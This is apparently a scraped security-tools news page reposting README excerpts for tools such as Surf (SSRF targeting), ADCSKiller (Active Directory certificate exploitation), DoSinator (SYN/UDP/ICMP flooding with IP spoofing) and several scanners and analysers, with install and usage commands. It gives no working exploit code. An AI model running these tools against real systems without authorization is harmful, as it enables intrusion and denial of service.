  • Vulnerability Hunting with pattern recognition: Leverage the toolkit's scripts to identify potential vulnerabilities within the codebase being analyzed. This helps security researchers and developers uncover security weaknesses and proactively address them.
  • Vulnerability Hunting with SemGrep: Thanks to the security Researcher 0xdea and the rule-set they created, we can use simple rules and SemGrep to detect vulnerabilities in C/C++ pseudo code (their github: https://github.com/0xdea/semgrep-rules)
  • Automatic Pseudo Code Generating: Automatically generate pseudo code within Ghidra's Headless mode. This feature assists in understanding and documenting the code logic without manual intervention.
  • Pseudo-code Commenting with ChatGPT: Enhance the readability and understanding of the codebase by utilizing ChatGPT to generate human-like comments for pseudo-code snippets. This feature assists in documenting and explaining the code logic.
  • Reporting and Data Visualization: Generate comprehensive reports with visualizations to summarize and present the analysis results effectively. The toolkit provides data visualization capabilities to aid in identifying patterns, dependencies, and anomalies in the codebase.

Pre-requisites

Before using this project, make sure you have the following software installed:

Installation

  • Install the pre-requisites mentionned above.
  • Download Sekiryu release directly from Github or use: pip install sekiryu.

Usage

In order to use the script you can simply run it against a binary with the options that you want to execute.

  • sekiryu [-F FILE][OPTIONS]

Please note that performing a binary analysis with Ghidra (or any other product) is a relatively slow process. Thus, expect the binary analysis to take several minutes depending on the host performance. If you run Sekiryu against a very large application or a large amount of binary files, be prepared to WAIT

Demos

API

In order to use it the User must import xmlrpc in their script and call the function like for example: proxy.send_data

Functions

  • send_data() - Allows user to send data to the server. ("data" is a Dictionnary)
  • recv_data() - Allows user to receive data from the server. ("data" is a Dictionnary)
  • request_GPT() - Allows user to send string data via ChatGPT API.

Use your own scripts

Scripts are saved in the folder /modules/scripts/ you can simply copy your script there. In the ghidra_pilot.py file you can find the following function which is responsible to run a headless ghidra script:

def exec_headless(file, script):
"""
Execute the headless analysis of ghidra
"""
path = ghidra_path + 'analyzeHeadless'
# Setting variables
tmp_folder = "/tmp/out"
os.mkdir(tmp_folder)
cmd = ' ' + tmp_folder + ' TMP_DIR -import'+ ' '+ file + ' '+ "-postscript "+ script +" -deleteProject"

# Running ghidra with specified file and script
try:
p = subprocess.run([str(path + cmd)], shell=True, capture_output=True)
os.rmdir(tmp_folder)

except KeyError as e:
print(e)
os.rmdir(tmp_folder)

The usage is pretty straight forward, you can create your own script then just add a function in the ghidra_pilot.py such as:

def yourfunction(file):
try:
# Setting script
script = "modules/scripts/your_script.py"

# Start the exec_headless function in a new thread
thread = threading.Thread(target=exec_headless, args=(file, script))
thread.start()
thread.join()
except Exception as e:
print(str(e))

The file cli.py is responsible for the command-line-interface and allows you to add argument and command associated like this:

analysis_parser.add_argument('[-ShortCMD]', '[--LongCMD]', help="Your Help Message", action="store_true")

Contributions

  • Scripts/SCRIPTS/SCRIIIIIPTS: This tool is designed to be a toolkit allowing user to save and run their own script easily, obviously if you can contribue in any sort of script (anything that is interesting will be approved !)
  • Optimization: Any kind of optimization are welcomed and will almost automically be approved and deployed every release, some nice things could be: improve parallel tasking, code cleaning and overall improvement.
  • Malware analysis: It's a big part, which i'm not familiar with. Any malware analyst willing to contribute can suggest idea, script, or even commit code directly in the project.
  • Reporting: I ain't no data visualization engineer, if anyone is willing to improve/contribue on this part, it'll be very nice.

Warning

The xmlrpc.server module is not secure against maliciously constructed data. If you need to parse 
untrusted or unauthenticated data see XML vulnerabilities.

Special thanks

A lot of people encouraged me to push further on this tool and improve it. Without you all this project wouldn't have been
the same so it's time for a proper shout-out:
- @JeanBedoul @McProustinet @MilCashh @Aspeak @mrjay @Esbee|sandboxescaper @Rosen @Cyb3rops @RussianPanda @Dr4k0nia
- @Inversecos @Vs1m @djinn @corelanc0d3r @ramishaath @chompie1337
Thanks for your feedback, support, encouragement, test, ideas, time and care.

For more information about Bushido Security, please visit our website: https://www.bushido-sec.com/.



Callisto - An Intelligent Binary Vulnerability Analysis Tool

By: Zion3R


Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the psuedo code output looking for potential security vulnerabilities in that pseudo c code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.

I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

Requirements:

  • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
  • Ghidra
  • Semgrep - pip install semgrep
  • requirements.txt - pip install -r requirements.txt
  • Ensure the correct path to your Ghidra directory is set in the config.txt file

To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

  • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
  • -o => define an output file, if you want to save the output
  • -ai and -o are optional parameters
  • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
  • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
  • Ex. (Running all functions through AI Analysis):
    python callisto.py -b vulnProgram.exe -ai -all -o results.txt

Program Output Example:



Surf - Escalate Your SSRF Vulnerabilities On Modern Cloud Environments

By: Zion3R


surf allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.

You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.

Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.


Installation

This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.

It can be installed with the following command:

go install github.com/assetnote/surf/cmd/surf@latest

Usage

Consider that you have subdomains for bigcorp.com inside a file named bigcorp.txt, and you want to find all the SSRF candidates for these subdomains. Here are some examples:

# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x

The full list of settings can be found below:

❯ surf -h

███████╗██╗ ██╗██████╗ ███████╗
██╔════╝██║ ██║██╔══██╗██╔════╝
███████╗██║ ██║██████╔╝█████╗
╚════██║██║ ██║██╔══██╗██╔══╝
███████║╚██████╔ ██║ ██║██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝

by shubs @ assetnote

Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]

Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit

Output

When running surf, it will print out the SSRF candidates to stdout, but it will also save two files inside the folder it is ran from:

  • external-{timestamp}.txt - Externally resolving, but unable to send HTTP requests to from your machine
  • internal-{timestamp}.txt - Internally resolving, and obviously unable to send HTTP requests from your machine

These two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.

Acknowledgements

Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.

This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).



ADCSKiller - An ADCS Exploitation Automation Tool Weaponizing Certipy And Coercer

By: Zion3R

ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that the ADCSKiller is currently in its first drafts and will undergo further refinements and additions in future updates for sure.


Features

  • Enumerate Domain Administrators via LDAP
  • Enumerate Domaincontrollers via LDAP
  • Enumerate Certificate Authorities via Certipy
  • Exploitation of ESC1
  • Exploitation of ESC8

Installation

Since this tool relies on Certipy and Coercer, both tools have to be installed first.

git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt

Usage

Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST

Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required

Todos

  • Tests, Tests, Tests
  • Enumerate principals which are allowed to dcsync
  • Use dirkjanm's gettgtpkinit.py to receive a ticket instead of Certipy auth
  • Support DC Certificate Authorities
  • ESC2 - ESC7
  • ESC9 - ESC11?
  • Automated add an ADIDNS entry if required
  • Support DCSync functionality

Credits



NucleiFuzzer - Powerful Automation Tool For Detecting XSS, SQLi, SSRF, Open-Redirect, Etc.. Vulnerabilities In Web Applications

By: Zion3R

NucleiFuzzer is an automation tool that combines ParamSpider and Nuclei to enhance web application security testing. It uses ParamSpider to identify potential entry points and Nuclei's templates to scan for vulnerabilities. NucleiFuzzer streamlines the process, making it easier for security professionals and web developers to detect and address security risks efficiently. Download NucleiFuzzer to protect your web applications from vulnerabilities and attacks.

Note: Nuclei + Paramspider = NucleiFuzzer

Tools included:

ParamSpider git clone https://github.com/0xKayala/ParamSpider.git

Nuclei git clone https://github.com/projectdiscovery/nuclei.git

Templates:

Fuzzing Templates git clone https://github.com/projectdiscovery/fuzzing-templates.git

Output



Usage

nucleifuzzer -h

This will display help for the tool. Here are the options it supports.

Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc. vulnerabilities in Web Applications Usage: /usr/local/bin/nucleifuzzer [options] Options: -h, --help Display help information -d, --domain <domain> Domain to scan for XSS, SQLi, SSRF, Open-Redirect..etc vulnerabilities" dir="auto">
NucleiFuzzer is a Powerful Automation tool for detecting XSS, SQLi, SSRF, Open-Redirect, etc. vulnerabilities in Web Applications

Usage: /usr/local/bin/nucleifuzzer [options]

Options:
-h, --help Display help information
-d, --domain <domain> Domain to scan for XSS, SQLi, SSRF, Open-Redirect..etc vulnerabilities

Steps to Install:

  1. git clone https://github.com/0xKayala/NucleiFuzzer.git
  2. cd NucleiFuzzer
  3. sudo chmod +x install.sh
  4. ./install.sh
  5. nucleifuzzer -h

Made by Satya Prakash | 0xKayala \

A Security Researcher and Bug Hunter \


VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

By: Zion3R

VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


Features

1. Directory-Based Scanning

VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

2. Detailed Scan Reports

Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

3. Hash-Based Checks

VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

4. VirusTotal Integration

VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

5. Time Delay Functionality

For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

6. Premium API Support

If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

7. Interactive VirusTotal Exploration

VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

8. Preinstalled Windows Binaries

For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

9. Custom Binary Generation

If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

Installation

Prerequisites

Before installing VTScanner, make sure you have the following prerequisites in place:

  • Python 3.6 installed on your system.
pip install -r requirements.txt

Download VTScanner

You can acquire VTScanner by cloning the GitHub repository to your local machine:

git clone https://github.com/samhaxr/VTScanner.git

Usage

To initiate VTScanner, follow these steps:

cd VTScanner
python3 VTScanner.py

Configuration

  • Set the time delay between scan requests.
  • Enter your VirusTotal API key in config.ini

License

VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

Disclaimer

VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python dnssnif.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap


DoSinator - A Powerful Denial Of Service (DoS) Testing Tool

By: Zion3R


DoSinator is a versatile Denial of Service (DoS) testing tool developed in Python. It empowers security professionals and researchers to simulate various types of DoS attacks, allowing them to assess the resilience of networks, systems, and applications against potential cyber threats. 


Features

  • Multiple Attack Modes: DoSinator supports SYN Flood, UDP Flood, and ICMP Flood attack modes, allowing you to simulate various types of DoS attacks.
  • Customizable Parameters: Adjust the packet size, attack rate, and duration to fine-tune the intensity and duration of the attack.
  • IP Spoofing: Enable IP spoofing to mask the source IP address and enhance anonymity during the attack.
  • Multithreaded Packet Sending: Utilize multiple threads for simultaneous packet sending, maximizing the attack speed and efficiency.

Requirements

  • Python 3.x
  • scapy
  • argparse

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/DoSinator.git
  2. Navigate to the project directory:

    cd DoSinator
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

packets to send (default: 500). -ps PACKET_SIZE, --packet_size PACKET_SIZE Packet size in bytes (default: 64). -ar ATTACK_RATE, --attack_rate ATTACK_RATE Attack rate in packets per second (default: 10). -d DURATION, --duration DURATION Duration of the attack in seconds. -am {syn,udp,icmp,http,dns}, --attack-mode {syn,udp,icmp,http,dns} Attack mode (default: syn). -sp SPOOF_IP, --spoof-ip SPOOF_IP Spoof IP address. --data DATA Custom data string to send." dir="auto">
usage: dos_tool.py [-h] -t TARGET -p PORT [-np NUM_PACKETS] [-ps PACKET_SIZE]
[-ar ATTACK_RATE] [-d DURATION] [-am {syn,udp,icmp,http,dns}]
[-sp SPOOF_IP] [--data DATA]

optional arguments:
-h, --help Show this help message and exit.
-t TARGET, --target TARGET
Target IP address.
-p PORT, --port PORT Target port number.
-np NUM_PACKETS, --num_packets NUM_PACKETS
Number of packets to send (default: 500).
-ps PACKET_SIZE, --packet_size PACKET_SIZE
Packet size in bytes (default: 64).
-ar ATTACK_RATE, --attack_rate ATTACK_RATE
Attack rate in packets per second (default: 10).
-d DURATION, --duration DURATION
Duration of the attack in seconds.
-am {syn,udp,icmp,htt p,dns}, --attack-mode {syn,udp,icmp,http,dns}
Attack mode (default: syn).
-sp SPOOF_IP, --spoof-ip SPOOF_IP
Spoof IP address.
--data DATA Custom data string to send.
  • target_ip: IP address of the target system.
  • target_port: Port number of the target service.
  • num_packets: Number of packets to send (default: 500).
  • packet_size: Size of each packet in bytes (default: 64).
  • attack_rate: Attack rate in packets/second (default: 10).
  • duration: Duration of the attack in seconds.
  • attack_mode: Attack mode: syn, udp, icmp, http (default: syn).
  • spoof_ip: Spoof IP address (default: None).
  • data: Custom data string to send.

Disclaimer

The usage of the Dosinator tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The author assumes no liability and is not responsible for any misuse or damage caused by this program.

By using Dosinator, you agree to use this tool for educational and ethical purposes only. The author is not responsible for any actions or consequences resulting from misuse of this tool.

Please ensure that you have the necessary permissions to conduct any form of testing on a target network. Use this tool at your own risk.

Contributing

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

Contact

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:



Temcrypt - Evolutionary Encryption Framework Based On Scalable Complexity Over Time

By: Zion3R


The Next-gen Encryption

Try temcrypt on the Web →

temcrypt SDK

Focused on protecting highly sensitive data, temcrypt is an advanced multi-layer data evolutionary encryption mechanism that offers scalable complexity over time, and is resistant to common brute force attacks.

You can create your own applications, scripts and automations when deploying it.

Knowledge

Find out what temcrypt stands for, the features and inspiration that led me to create it and much more. READ THE KNOWLEDGE DOCUMENT. This is very important to you.


Compatibility

temcrypt is compatible with both Node.js v18 or major, and modern web browsers, allowing you to use it in various environments.

Getting Started

The only dependencies that temcrypt uses are crypto-js for handling encryption algorithms like AES-256, SHA-256 and some encoders and fs is used for file handling with Node.js

To use temcrypt, you need to have Node.js installed. Then, you can install temcrypt using npm:

npm install temcrypt

after that, import it in your code as follows:

const temcrypt = require("temcrypt");

Includes an auto-install feature for its dependencies, so you don't have to worry about installing them manually. Just run the temcrypt.js library and the dependencies will be installed automatically and then call it in your code, this was done to be portable:

node temcrypt.js

Alternatively, you can use temcrypt directly in the browser by including the following script tag:

<script src="temcrypt.js"></script>

or minified:

<script src="temcrypt.min.js"></script>

You can also call the library on your website or web application from a CDN:

<script src="https://cdn.jsdelivr.net/gh/jofpin/temcrypt/temcrypt.min.js"></script>

Usage

ENCRYPT & DECRYPT

temcrypt provides functions like encrypt and decrypt to securely protect and disclose your information.

Parameters

  • dataString (string): The string data to encrypt.
  • dataFiles (string): The file path to encrypt. Provide either dataString or dataFiles.
  • mainKey (string): The main key (private) for encryption.
  • extraBytes (number, optional): Additional bytes to add to the encryption. Is an optional parameter used in the temcrypt encryption process. It allows you to add extra bytes to the encrypted data, increasing the complexity of the encryption, which requires more processing power to decrypt. It also serves to make patterns lose by changing the weight of the encryption.

Returns

  • If successful:
    • status (boolean): true to indicate successful decryption.
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • dataString (string) or dataFiles: The decrypted string or the file path of the decrypted file, depending on the input.
    • updatedEncryptedData (string): The updated encrypted data after decryption. The updated encrypted data after decryption. Every time the encryption is decrypted, the output is updated, because the mainKey changes its order and the new date of last decryption is saved.
    • creationDate (string): The creation date of the encrypted data.
    • lastDecryptionDate (string): The date of the last successful decryption of the data.
  • If dataString is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key (private) used for encryption.
    • timeKey (string): The time key (private) of the encryption.
    • dataString (string): The encrypted string.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If dataFiles is provided:
    • hash (string): The unique hash generated for the legitimacy verify of the encrypted data.
    • mainKey (string): The main key used for encryption.
    • timeKey (string): The time key of the encryption.
    • dataFiles (string): The file path of the encrypted file.
    • extraBytes (number, optional): The extra bytes used for encryption.
  • If decryption fails:
    • status (boolean): false to indicate decryption failure.
    • error_code (number): An error code indicating the reason for decryption failure.
    • message (string): A descriptive error message explaining the decryption failure.

Here are some examples of how to use temcrypt. Please note that when encrypting, you must enter a key and save the hour and minute that you encrypted the information. To decrypt the information, you must use the same main key at the same hour and minute on subsequent days:

Encrypt a String

const dataToEncrypt = "Sensitive data";
const mainKey = "your_secret_key"; // Insert your custom key

const encryptedData = temcrypt.encrypt({
dataString: dataToEncrypt,
mainKey: mainKey
});

console.log(encryptedData);

Decrypt a String

const encryptedData = "..."; // Encrypted data obtained from the encryption process
const mainKey = "your_secret_key";

const decryptedData = temcrypt.decrypt({
dataString: encryptedData,
mainKey: mainKey
});

console.log(decryptedData);

Encrypt a File:

To encrypt a file using temcrypt, you can use the encrypt function with the dataFiles parameter. Here's an example of how to encrypt a file and obtain the encryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt";
const mainKey = "your_secret_key";

const result = temcrypt.encrypt({
dataFiles: filePath,
mainKey: mainKey,
extraBytes: 128 // Optional: Add 128 extra bytes
});

console.log(result);

In this example, replace 'test.txt' with the actual path to the file you want to encrypt and set 'your_secret_key' as the main key for the encryption. The result object will contain the encryption details, including the unique hash, main key, time key, and the file path of the encrypted file.

Decrypt a File:

To decrypt a file that was previously encrypted with temcrypt, you can use the decrypt function with the dataFiles parameter. Here's an example of how to decrypt a file and obtain the decryption result:

const temcrypt = require("temcrypt");

const filePath = "path/test.txt.trypt";
const mainKey = "your_secret_key";

const result = temcrypt.decrypt({
dataFiles: filePath,
mainKey: mainKey
});

console.log(result);

In this example, replace 'path/test.txt.trypt' with the actual path to the encrypted file, and set 'your_secret_key' as the main key for decryption. The result object will contain the decryption status and the decrypted data, if successful.

Remember to provide the correct main key used during encryption to successfully decrypt the file, at the exact same hour and minute that it was encrypted. If the main key is wrong or the file was tampered with or the time is wrong, the decryption status will be false and the decrypted data will not be available.


UTILS

temcrypt provides utils functions to perform additional operations beyond encryption and decryption. These utility functions are designed to enhance the functionality and usability.

Function List:

  1. changeKey: Change your encryption mainKey
  2. check: Check if the encryption belongs to temcrypt
  3. verify: Checks if a hash matches the legitimacy of the encrypted output.

Below, you can see the details and how to implement its uses.

Update MainKey:

The changeKey utility function allows you to change the mainKey used to encrypt the data while keeping the encrypted data intact. This is useful when you want to enhance the security of your encrypted data or update the mainKey periodically.

Parameters

  • dataFiles (optional): The path to the file that was encrypted using temcrypt.
  • dataString (optional): The encrypted string that was generated using temcrypt.
  • mainKey (string): The current mainKey used to encrypt the data.
  • newKey(string): The new mainKey that will replace the current mainKey.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const currentMainKey = "my_recent_secret_key";
const newMainKey = "new_recent_secret_key";

// Update mainKey for the encrypted file
const result = temcrypt.utils({
changeKey: {
dataFiles: filePath,
mainKey: currentMainKey,
newKey: newMainKey
}
});

console.log(result.message);

Check Data Integrity:

The check utility function allows you to verify the integrity of the data encrypted using temcrypt. It checks whether a file or a string is a valid temcrypt encrypted data.

Parameters

  • dataFiles (optional): The path to the file that you want to check.
  • dataString (optional): The encrypted string that you want to check.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const encryptedString = "..."; // Encrypted string generated by temcrypt

// Check the integrity of the encrypted File
const result = temcrypt.utils({
check: {
dataFiles: filePath
}
});

console.log(result.message);

// Check the integrity of the encrypted String
const result2 = temcrypt.utils({
check: {
dataString: encryptedString
}
});

console.log(result2.message);

Verify Hash:

The verify utility function allows you to verify the integrity of encrypted data using its hash value. Checks if the encrypted data output matches the provided hash value.

Parameters

  • hash (string): The hash value to verify against.
  • dataFiles (optional): The path to the file whose hash you want to verify.
  • dataString (optional): The encrypted string whose hash you want to verify.
const temcrypt = require("temcrypt");

const filePath = "test.txt.trypt";
const hashToVerify = "..."; // The hash value to verify

// Verify the hash of the encrypted File
const result = temcrypt.utils({
verify: {
hash: hashToVerify,
dataFiles: filePath
}
});

console.log(result.message);

// Verify the hash of the encrypted String
const result2 = temcrypt.utils({
verify: {
hash: hashToVerify,
dataString: encryptedString
}
});

console.log(result2.message);

Error Codes

The following table presents the important error codes and their corresponding error messages used by temcrypt to indicate various error scenarios.

Code Error Message Description
420 Decryption time limit exceeded The decryption process took longer than the allowed time limit.
444 Decryption failed The decryption process encountered an error.
777 No data provided No data was provided for the operation.
859 Invalid temcrypt encrypted string The provided string is not a valid temcrypt encrypted string.

Examples

Check out the examples directory for more detailed usage examples.

WARNING

The encryption size of a string or file should be less than 16 KB (kilobytes). If it's larger, you must have enough computational power to decrypt it. Otherwise, your personal computer will exceed the time required to find the correct main key combination and proper encryption formation, and it won't be able to decrypt the information.

TIPS

  1. With temcrypt you can only decrypt your information in later days with the key that you entered at the same hour and minute that you encrypted.
  2. Focus on time, it is recommended to start the decryption between the first 2 to 10 seconds, so you have an advantage to generate the correct key formation.

License

The content of this project itself is licensed under the Creative Commons Attribution 3.0 license, and the underlying source code used to format and display that content is licensed under the MIT license.

Copyright (c) 2023 by Jose Pino



AD_Enumeration_Hunt - Collection Of PowerShell Scripts And Commands That Can Be Used For Active Directory (AD) Penetration Testing And Security Assessment

By: Zion3R


Description

Welcome to the AD Pentesting Toolkit! This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment. The scripts cover various aspects of AD enumeration, user and group management, computer enumeration, network and security analysis, and more.

The toolkit is intended for use by penetration testers, red teamers, and security professionals who want to test and assess the security of Active Directory environments. Please ensure that you have proper authorization and permission before using these scripts in any production environment.

Everyone is looking at what you are looking at; But can everyone see what he can see? You are the only difference between them… By Mevlânâ Celâleddîn-i Rûmî


Features

  • Enumerate and gather information about AD domains, users, groups, and computers.
  • Check trust relationships between domains.
  • List all objects inside a specific Organizational Unit (OU).
  • Retrieve information about the currently logged-in user.
  • Perform various operations related to local users and groups.
  • Configure firewall rules and enable Remote Desktop (RDP).
  • Connect to remote machines using RDP.
  • Gather network and security information.
  • Check Windows Defender status and exclusions configured via GPO.
  • ...and more!

Usage

  1. Clone the repository or download the scripts as needed.
  2. Run the PowerShell script using the appropriate PowerShell environment.
  3. Follow the on-screen prompts to provide domain, username, and password when required.
  4. Enjoy exploring the AD Pentesting Toolkit and use the scripts responsibly!

Disclaimer

The AD Pentesting Toolkit is for educational and testing purposes only. The authors and contributors are not responsible for any misuse or damage caused by the use of these scripts. Always ensure that you have proper authorization and permission before performing any penetration testing or security assessment activities on any system or network.

License

This project is licensed under the MIT License. The Mewtwo ASCII art is the property of Alperen Ugurlu. All rights reserved.

Cyber Security Consultant

Alperen Ugurlu



Bryobio - NETWORK Pcap File Analysis

By: Zion3R


NETWORK Pcap File Analysis, It was developed to speed up the processes of SOC Analysts during analysis


Tested

OK Debian
OK Ubuntu

Requirements

$ pip install pyshark
$ pip install dpkt

$ Wireshark
$ Tshark
$ Mergecap
$ Ngrep

𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦

$ https://github.com/emrekybs/Bryobio.git
$ cd Bryobio
$ chmod +x bryobio.py

$ python3 bryobio.py



HackBot - A Simple Cli Chatbot Having Llama2 As Its Backend Chat AI

By: Zion3R


Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.

